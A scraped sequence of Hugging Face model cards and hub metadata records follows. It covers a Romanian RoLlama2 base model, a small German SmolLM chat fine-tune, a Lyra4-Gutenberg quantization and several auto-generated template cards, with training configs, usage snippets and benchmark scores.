type: text-generation
dataset:
name: XQuAD_F1
type: XQuAD_F1
metrics:
- name: 0-shot
type: f1
value: 16.17
- name: 1-shot
type: f1
value: 51.84
- name: 3-shot
type: f1
value: 58.82
- name: 5-shot
type: f1
value: 61.29
- task:
type: text-generation
dataset:
name: STS_Spearman
type: STS_Spearman
metrics:
- name: 1-shot
type: spearman
value: -1.74
- name: 3-shot
type: spearman
value: 15.47
- name: 5-shot
type: spearman
value: 9.93
- task:
type: text-generation
dataset:
name: STS_Pearson
type: STS_Pearson
metrics:
- name: 1-shot
type: pearson
value: -1.40
- name: 3-shot
type: pearson
value: 15.00
- name: 5-shot
type: pearson
value: 10.33
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
RoLlama2 is a family of pretrained and fine-tuned generative text models for Romanian. This is the repository for the **foundational 7B model**. Links to other models can be found at the bottom of this page.
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
OpenLLM represents the first open-source effort to build a LLM specialized for Romanian. OpenLLM-Ro developed and publicly releases a collection of Romanian LLMs, both in the form of foundational model and instruct and chat variants.
- **Developed by:** OpenLLM-Ro
<!-- - **Funded by [optional]:** [More Information Needed] -->
<!-- - **Shared by [optional]:** [More Information Needed] -->
<!-- - **Model type:** [More Information Needed] -->
- **Language(s):** Romanian
- **License:** Llama2 Community License Agreement
- **Continual pretrained from model:** [Llama-2-7b](https://huggingface.co/meta-llama/Llama-2-7b-hf)
- **Trained using:** [CulturaX](https://huggingface.co/datasets/uonlp/CulturaX)
### Model Sources
<!-- Provide the basic links for the model. -->
- **Repository:** https://github.com/OpenLLM-Ro/llama-recipes
- **Paper:** https://arxiv.org/abs/2406.18266
## Intended Use
### Intended Use Cases
RoLlama2 is intented for research use in Romanian. Base models can be adapted for a variety of natural language tasks while instruction and chat tuned models are intended for assistant-like chat.
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
Use in any manner that violates the license, any applicable laws or regluations, use in languages other than Romanian.
## How to Get Started with the Model
Use the code below to get started with the model.
```python
from transformers import AutoTokenizer, AutoModelForCausalLM
tokenizer = AutoTokenizer.from_pretrained("OpenLLM-Ro/RoLlama2-7b-Base-2024-05-14")
model = AutoModelForCausalLM.from_pretrained("OpenLLM-Ro/RoLlama2-7b-Base-2024-05-14")
input_text = "Mihai Eminescu a fost "
input_ids = tokenizer(input_text, return_tensors="pt")
outputs = model.generate(**input_ids, max_new_tokens=100)
print(tokenizer.decode(outputs[0]))
```
## Academic Benchmarks
<table>
<tbody>
<tr>
<td><strong>Model</strong></td>
<td><strong><center>Average</center></strong></td>
<td><strong><center>ARC</center></strong></td>
<td><strong><center>MMLU</center></strong></td>
<td><strong><center>Winogrande</center></strong></td>
<td><strong><center>Hellaswag</center></strong></td>
<td><strong><center>GSM8k</center></strong></td>
<td><strong><center>TruthfulQA</center></strong></td>
</tr>
<tr>
<td>Llama-2-7b</td><td><center>37.04</center></td><td><center>36.05</center></td><td><center><strong>33.66</strong></center></td><td><center>57.56</center></td><td><center>48.00</center></td><td><center><strong>4.75</strong></center></td><td><center>42.22</center></td>
</tr>
<tr>
<td><em>RoLlama2-7b-Base-2024-05-14</em></td><td><center><em><strong>38.03</strong></em></center></td><td><center><em><strong>37.95</strong></em></center></td><td><center><em>27.22</em></center></td><td><center><em><strong>59.29</strong></em></center></td><td><center><em><strong>57.22</strong></em></center></td><td><center><em>2.53</em></center></td><td><center><em><strong>44.00</strong></em></center></td>
</tr>
</tbody>
</table>
## Downstream Tasks
<table>
<tbody>
<tr>
<td></td>
<td colspan="4"><center><strong>LaRoSeDa</strong></center></td>
<td colspan="4"><center><strong>WMT</strong></center></td>
</tr>
<tr>
<td></td>
<td colspan="2"><center><strong>Few-shot</strong></center></td>
<td colspan="2"><center><strong>Finetuned</strong></center></td>
<td colspan="2"><center><strong>Few-shot</strong></center></td>
<td colspan="2"><center><strong>Finetuned</strong></center></td>
</tr>
<tr>
<td><strong>Model</strong></td>
<td><center><strong>Binary<br>(Macro F1)</strong></center></td>
<td><center><strong>Multiclass<br>(Macro F1)</strong></center></td>
<td><center><strong>Binary<br>(Macro F1)</strong></center></td>
<td><center><strong>Multiclass<br>(Macro F1)</strong></center></td>
<td><center><strong>EN-RO<br>(Bleu)</strong></center></td>
<td><center><strong>RO-EN<br>(Bleu)</strong></center></td>
<td><center><strong>EN-RO<br>(Bleu)</strong></center></td>
<td><center><strong>RO-EN<br>(Bleu)</strong></center>
</tr>
<tr>
<td>Llama-2-7b</td><td><center><strong>93.19</strong></center></td><td><center>54.11</center></td><td><center>98.43</center></td><td><center>87.22</center></td><td><center><strong>14.90</strong></center></td><td><center><strong>26.61</strong></center></td><td><center>24.95</center></td><td><center>39.09</center></td>
</tr>
<tr>
<td><em>RoLlama2-7b-Base-2024-05-14</em></td><td><center><em>83.25</em></center></td><td><center><em><strong>61.04</strong></em></center></td><td><center><em><strong>98.97</strong></em></center></td><td><center><em><strong>87.72</strong></em></center></td><td><center><em>10.01</em></center></td><td><center><em>13.03</em></center></td><td><center><em><strong>27.85</strong></em></center></td><td><center><em><strong>39.30</strong></em></center></td>
</tr>
</tbody>
</table>
<table>
<tbody>
<tr>
<td></td>
<td colspan="4"><center><strong>XQuAD</strong></center></td>
<td colspan="4"><center><strong>STS</strong></center></td>
</tr>
<tr>
<td></td>
<td colspan="2"><center><strong>Few-shot</strong></center></td>
<td colspan="2"><center><strong>Finetuned</strong></center></td>
<td colspan="2"><center><strong>Few-shot</strong></center></td>
<td colspan="2"><center><strong>Finetuned</strong></center></td>
</tr>
<tr>
<td><strong>Model</strong></td>
<td><center><strong>(EM)</strong></center></td>
<td><center><strong>(F1)</strong></center></td>
<td><center><strong>(EM)</strong></center></td>
<td><center><strong>(F1)</strong></center></td>
<td><center><strong>(Spearman)</strong></center></td>
<td><center><strong>(Pearson)</strong></center></td>
<td><center><strong>(Spearman)</strong></center></td>
<td><center><strong>(Pearson)</strong></center></td>
</tr>
<tr>
<td>Llama-2-7b</td><td><center><strong>38.91</strong></center></td><td><center><strong>56.82</strong></center></td><td><center>65.46</center></td><td><center>79.42</center></td><td><center><strong>9.08</strong></center></td><td><center><strong>9.07</strong></center></td><td><center><strong>79.93</strong></center></td><td><center><strong>81.08</strong></center></td>
</tr>
<tr>
<td><em>RoLlama2-7b-Base-2024-05-14</em></td><td><center><em>30.15</em></center></td><td><center><em>47.03</em></center></td><td><center><em><strong>67.06</strong></em></center></td><td><center><em><strong>79.96</strong></em></center></td><td><center><em>7.89</em></center></td><td><center><em>7.98</em></center></td><td><center><em>71.75</em></center></td><td><center><em>71.99</em></center></td>
</tr>
</tbody>
</table>
## RoLlama2 Model Family
| Model | Link |
|--------------------|:--------:|
|RoLlama2-7b-Base-2024-05-14 | [link](https://huggingface.co/OpenLLM-Ro/RoLlama2-7b-Base-2024-05-14) |
|RoLlama2-7b-Instruct-2024-05-14 | [link](https://huggingface.co/OpenLLM-Ro/RoLlama2-7b-Instruct-2024-05-14) |
|*RoLlama2-7b-Instruct-2024-10-09*| [link](https://huggingface.co/OpenLLM-Ro/RoLlama2-7b-Instruct-2024-10-09) |
|RoLlama2-7b-Instruct-DPO-2024-10-09| [link](https://huggingface.co/OpenLLM-Ro/RoLlama2-7b-Instruct-DPO-2024-10-09) |
## Citation
```
@misc{masala2024vorbecstiromanecsterecipetrain,
title={"Vorbe\c{s}ti Rom\^ane\c{s}te?" A Recipe to Train Powerful Romanian LLMs with English Instructions},
author={Mihai Masala and Denis C. Ilie-Ablachim and Alexandru Dima and Dragos Corlatescu and Miruna Zavelca and Ovio Olaru and Simina Terian-Dan and Andrei Terian-Dan and Marius Leordeanu and Horia Velicu and Marius Popescu and Mihai Dascalu and Traian Rebedea},
year={2024},
eprint={2406.18266},
archivePrefix={arXiv},
primaryClass={cs.CL},
url={https://arxiv.org/abs/2406.18266},
}
```
<!-- **APA:**
[More Information Needed] --> |
LemiSt/SmolLM-135M-instruct-de-merged | LemiSt | 2024-10-10T13:28:08Z | 132 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"axolotl",
"generated_from_trainer",
"conversational",
"de",
"base_model:LemiSt/SmolLM-135M-de",
"base_model:finetune:LemiSt/SmolLM-135M-de",
"license:apache-2.0",
"model-index",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-10-10T11:07:01Z | ---
base_model: LemiSt/SmolLM-135M-de
library_name: transformers
license: apache-2.0
tags:
- axolotl
- generated_from_trainer
model-index:
- name: SmolLM-135M-instruct-de-merged
results:
- task:
type: text-generation
dataset:
name: openai/MMMLU
type: mmlu
metrics:
- name: MMMLU(DE_DE) (0-Shot)
type: accuracy
value: 25.57
verified: false
- task:
type: text-generation
dataset:
name: openai/MMMLU
type: mmlu
metrics:
- name: MMMLU(DE_DE) (5-Shot)
type: accuracy
value: 24.88
verified: false
- task:
type: text-generation
dataset:
name: alexandrainst/m_arc
type: arc
metrics:
- name: ARC Challenge (DE) (0-Shot)
type: accuracy
value: 24.29
verified: false
- task:
type: text-generation
dataset:
name: alexandrainst/m_arc
type: arc
metrics:
- name: ARC Challenge (DE) (5-Shot)
type: accuracy
value: 24.38
verified: false
- task:
type: text-generation
dataset:
name: deutsche-telekom/Ger-RAG-eval
type: Ger-RAG-eval
metrics:
- name: Task 1
type: accuracy
value: 25.2
verified: false
- name: Task 2
type: accuracy
value: 27.1
verified: false
- name: Task 3
type: accuracy
value: 50.9
verified: false
- name: Task 4
type: accuracy
value: 50.0
verified: false
language:
- de
pipeline_tag: text-generation
---
[<img src="https://raw.githubusercontent.com/axolotl-ai-cloud/axolotl/main/image/axolotl-badge-web.png" alt="Built with Axolotl" width="200" height="32"/>](https://github.com/axolotl-ai-cloud/axolotl)
<details><summary>See axolotl config</summary>
axolotl version: `0.4.1`
```yaml
base_model: LemiSt/SmolLM-135M-de
model_type: LlamaForCausalLM
tokenizer_type: GPT2Tokenizer
load_in_8bit: false
load_in_4bit: true
strict: false
push_dataset_to_hub:
datasets:
- path: smollm_dataset.json
type: sharegpt
conversation: chatml
chat_template: chatml
default_system_prompt: "Du bist ein hilfreicher KI-Assistent."
dataset_prepared_path:
val_set_size: 0.05
adapter: qlora
lora_model_dir:
sequence_len: 2048
sample_packing: true
lora_r: 32
lora_alpha: 16
lora_dropout: 0.05
lora_target_modules:
lora_target_linear: true
lora_fan_in_fan_out:
wandb_project: smollm-135m-de-sft-qlora
wandb_entity:
wandb_watch:
wandb_name:
wandb_log_model:
output_dir: ./outputs/smollm-135m-sft-qlora-out
hub_model_id: LemiSt/SmolLM-135M-instruct-de
hub_strategy: end
gradient_accumulation_steps: 16
micro_batch_size: 2
num_epochs: 2
optimizer: adamw_bnb_8bit
torchdistx_path:
lr_scheduler: cosine
learning_rate: 0.003
train_on_inputs: false
group_by_length: false
bf16: true
fp16: false
tf32: false
gradient_checkpointing: true
early_stopping_patience:
resume_from_checkpoint:
local_rank:
logging_steps: 1
xformers_attention:
flash_attention: true
gptq_groupsize:
gptq_model_v1:
warmup_steps: 20
evals_per_epoch: 4
saves_per_epoch: 4
debug:
deepspeed:
weight_decay: 0.1
fsdp:
fsdp_config:
special_tokens:
bos_token: "<|endoftext|>"
eos_token: "<|endoftext|>"
unk_token: "<|endoftext|>"
```
</details><br>
# SmolLM-135M-instruct-de-merged
This model is a fine-tuned version of [LemiSt/SmolLM-135M-de](https://huggingface.co/LemiSt/SmolLM-135M-de) on an internal testing dataset with general chat examples.
It achieves the following results on the evaluation set:
- Loss: 0.7453
## Model description
For more information, see the model card of the [base model](https://huggingface.co/LemiSt/SmolLM-135M-de). This adapter was trained using qlora at rank 32 with alpha 16, applying a dataset of around 200k german chat samples for two epochs.
## Intended uses & limitations
Mainly playing around with tiny chat models - while the output is generally intact German and the model somewhat follows instructions, it makes too many mistakes to be deployed in a real world setting.
### Usage example
```python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
checkpoint = "LemiSt/SmolLM-135M-instruct-de-merged"
tokenizer = AutoTokenizer.from_pretrained(checkpoint)
device = "cuda" if torch.cuda.is_available() else "cpu"
model = AutoModelForCausalLM.from_pretrained(checkpoint, device_map=device, torch_dtype=torch.bfloat16)
messages = [
{"role": "system", "content": "Du bist ein hilfreicher Assistent."},
{"role": "user", "content": "Was ist der Sinn des Lebens?"}
]
inputs = tokenizer.apply_chat_template(messages, tokenize=True, return_tensors="pt", add_generation_prompt=True).to(device)
outputs = model.generate(inputs, max_new_tokens=256, do_sample=True, temperature=0.4, top_p=0.9, repetition_penalty=1.1, top_k=512)
print(tokenizer.decode(outputs[0][inputs.shape[1]:], skip_special_tokens=True))
```
## Training and evaluation data
Internal dataset which was compiled for another experiment.
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 0.003
- train_batch_size: 2
- eval_batch_size: 2
- seed: 42
- gradient_accumulation_steps: 16
- total_train_batch_size: 32
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: cosine
- lr_scheduler_warmup_steps: 20
- num_epochs: 2
### Training results
| Training Loss | Epoch | Step | Validation Loss |
|:-------------:|:------:|:----:|:---------------:|
| 1.6406 | 0.0005 | 1 | 1.6172 |
| 0.8219 | 0.2497 | 501 | 0.8901 |
| 0.8646 | 0.4995 | 1002 | 0.8370 |
| 0.8651 | 0.7492 | 1503 | 0.8052 |
| 0.7231 | 0.9989 | 2004 | 0.7827 |
| 0.7632 | 1.2468 | 2505 | 0.7673 |
| 0.7543 | 1.4967 | 3006 | 0.7536 |
| 0.7782 | 1.7466 | 3507 | 0.7469 |
| 0.6724 | 1.9966 | 4008 | 0.7453 |
### Framework versions
- PEFT 0.12.0
- Transformers 4.45.0.dev0
- Pytorch 2.3.1+cu121
- Datasets 2.21.0
- Tokenizers 0.19.1 |
QinLiuNLP/llama3-sudo-dpo-10epochs-forget10mixall-1sft-2fullpara-1e-5 | QinLiuNLP | 2024-10-10T13:24:54Z | 6 | 0 | null | [
"tensorboard",
"safetensors",
"llama",
"trl",
"dpo",
"generated_from_trainer",
"base_model:QinLiuNLP/llama3-sudo-5epochs-tofu_full_sft",
"base_model:finetune:QinLiuNLP/llama3-sudo-5epochs-tofu_full_sft",
"license:llama3",
"region:us"
] | null | 2024-10-09T05:13:50Z | ---
license: llama3
base_model: Jackie999/llama3-sudo-5epochs-tofu_full_sft
tags:
- trl
- dpo
- generated_from_trainer
model-index:
- name: llama3-sudo-dpo-10epochs-forget10mixall-1sft-2fullpara-1e-5
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# llama3-sudo-dpo-10epochs-forget10mixall-1sft-2fullpara-1e-5
This model is a fine-tuned version of [Jackie999/llama3-sudo-5epochs-tofu_full_sft](https://huggingface.co/Jackie999/llama3-sudo-5epochs-tofu_full_sft) on an unknown dataset.
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 1e-05
- train_batch_size: 4
- eval_batch_size: 8
- seed: 42
- distributed_type: multi-GPU
- num_devices: 4
- gradient_accumulation_steps: 4
- total_train_batch_size: 64
- total_eval_batch_size: 32
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: cosine
- lr_scheduler_warmup_ratio: 0.1
- num_epochs: 10
### Training results
### Framework versions
- Transformers 4.44.0
- Pytorch 2.1.2
- Datasets 3.0.0
- Tokenizers 0.19.1
|
PaulVialard/ppo-Huggy | PaulVialard | 2024-10-10T13:11:38Z | 6 | 0 | ml-agents | [
"ml-agents",
"tensorboard",
"onnx",
"Huggy",
"deep-reinforcement-learning",
"reinforcement-learning",
"ML-Agents-Huggy",
"region:us"
] | reinforcement-learning | 2024-10-10T12:52:33Z | ---
library_name: ml-agents
tags:
- Huggy
- deep-reinforcement-learning
- reinforcement-learning
- ML-Agents-Huggy
---
# **ppo** Agent playing **Huggy**
This is a trained model of a **ppo** agent playing **Huggy**
using the [Unity ML-Agents Library](https://github.com/Unity-Technologies/ml-agents).
## Usage (with ML-Agents)
The Documentation: https://unity-technologies.github.io/ml-agents/ML-Agents-Toolkit-Documentation/
We wrote a complete tutorial to learn to train your first agent using ML-Agents and publish it to the Hub:
- A *short tutorial* where you teach Huggy the Dog 🐶 to fetch the stick and then play with him directly in your
browser: https://huggingface.co/learn/deep-rl-course/unitbonus1/introduction
- A *longer tutorial* to understand how works ML-Agents:
https://huggingface.co/learn/deep-rl-course/unit5/introduction
### Resume the training
```bash
mlagents-learn <your_configuration_file_path.yaml> --run-id=<run_id> --resume
```
### Watch your Agent play
You can watch your agent **playing directly in your browser**
1. If the environment is part of ML-Agents official environments, go to https://huggingface.co/unity
2. Step 1: Find your model_id: PaulVialard/ppo-Huggy
3. Step 2: Select your *.nn /*.onnx file
4. Click on Watch the agent play 👀
|
Jellon/Lyra4-Gutenberg-12B-4bpw | Jellon | 2024-10-10T13:11:28Z | 6 | 0 | transformers | [
"transformers",
"safetensors",
"mistral",
"text-generation",
"conversational",
"dataset:jondurbin/gutenberg-dpo-v0.1",
"base_model:Sao10K/MN-12B-Lyra-v4",
"base_model:quantized:Sao10K/MN-12B-Lyra-v4",
"license:cc-by-nc-4.0",
"model-index",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"4-bit",
"exl2",
"region:us"
] | text-generation | 2024-10-10T12:48:41Z | ---
license: cc-by-nc-4.0
library_name: transformers
base_model:
- Sao10K/MN-12B-Lyra-v4
datasets:
- jondurbin/gutenberg-dpo-v0.1
model-index:
- name: Lyra4-Gutenberg-12B
results:
- task:
type: text-generation
name: Text Generation
dataset:
name: IFEval (0-Shot)
type: HuggingFaceH4/ifeval
args:
num_few_shot: 0
metrics:
- type: inst_level_strict_acc and prompt_level_strict_acc
value: 22.12
name: strict accuracy
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=nbeerbower/Lyra4-Gutenberg-12B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: BBH (3-Shot)
type: BBH
args:
num_few_shot: 3
metrics:
- type: acc_norm
value: 34.24
name: normalized accuracy
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=nbeerbower/Lyra4-Gutenberg-12B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: MATH Lvl 5 (4-Shot)
type: hendrycks/competition_math
args:
num_few_shot: 4
metrics:
- type: exact_match
value: 11.71
name: exact match
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=nbeerbower/Lyra4-Gutenberg-12B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: GPQA (0-shot)
type: Idavidrein/gpqa
args:
num_few_shot: 0
metrics:
- type: acc_norm
value: 9.17
name: acc_norm
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=nbeerbower/Lyra4-Gutenberg-12B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: MuSR (0-shot)
type: TAUR-Lab/MuSR
args:
num_few_shot: 0
metrics:
- type: acc_norm
value: 11.97
name: acc_norm
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=nbeerbower/Lyra4-Gutenberg-12B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: MMLU-PRO (5-shot)
type: TIGER-Lab/MMLU-Pro
config: main
split: test
args:
num_few_shot: 5
metrics:
- type: acc
value: 28.57
name: accuracy
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=nbeerbower/Lyra4-Gutenberg-12B
name: Open LLM Leaderboard
---
4bpw exl2 quant of: https://huggingface.co/nbeerbower/Lyra4-Gutenberg-12B
# Lyra4-Gutenberg-12B
[Sao10K/MN-12B-Lyra-v4](https://huggingface.co/Sao10K/MN-12B-Lyra-v4) finetuned on [jondurbin/gutenberg-dpo-v0.1](https://huggingface.co/datasets/jondurbin/gutenberg-dpo-v0.1).
### Method
ORPO Finetuned using an RTX 3090 + 4060 Ti for 3 epochs.
[Fine-tune Llama 3 with ORPO](https://mlabonne.github.io/blog/posts/2024-04-19_Fine_tune_Llama_3_with_ORPO.html)
# [Open LLM Leaderboard Evaluation Results](https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard)
Detailed results can be found [here](https://huggingface.co/datasets/open-llm-leaderboard/details_nbeerbower__Lyra4-Gutenberg-12B)
| Metric |Value|
|-------------------|----:|
|Avg. |19.63|
|IFEval (0-Shot) |22.12|
|BBH (3-Shot) |34.24|
|MATH Lvl 5 (4-Shot)|11.71|
|GPQA (0-shot) | 9.17|
|MuSR (0-shot) |11.97|
|MMLU-PRO (5-shot) |28.57|
|
zhuqiang/repr100 | zhuqiang | 2024-10-10T13:04:50Z | 0 | 0 | peft | [
"peft",
"llama",
"region:us"
] | null | 2024-06-10T20:01:31Z | ---
library_name: peft
---
## Training procedure
### Framework versions
- PEFT 0.4.0
|
doktor47/zinemind_msft_v8 | doktor47 | 2024-10-10T13:01:40Z | 187 | 0 | transformers | [
"transformers",
"safetensors",
"detr",
"object-detection",
"arxiv:1910.09700",
"endpoints_compatible",
"region:us"
] | object-detection | 2024-10-10T13:01:23Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
davidbae/ipa-asr | davidbae | 2024-10-10T12:58:22Z | 105 | 0 | transformers | [
"transformers",
"safetensors",
"wav2vec2",
"automatic-speech-recognition",
"arxiv:1910.09700",
"endpoints_compatible",
"region:us"
] | automatic-speech-recognition | 2024-10-10T03:26:05Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
- **Version**: v1
- **Eval Loss**: 2.0914
- **Eval CER**: 0.3226
- **Dataset**: train-Announcer, test-Foreign40
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
Trelis/Llama-3.2-1B-Instruct-MATH-20241010-125040 | Trelis | 2024-10-10T12:55:11Z | 126 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"trl",
"sft",
"conversational",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-10-10T12:54:01Z | ---
library_name: transformers
tags:
- trl
- sft
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
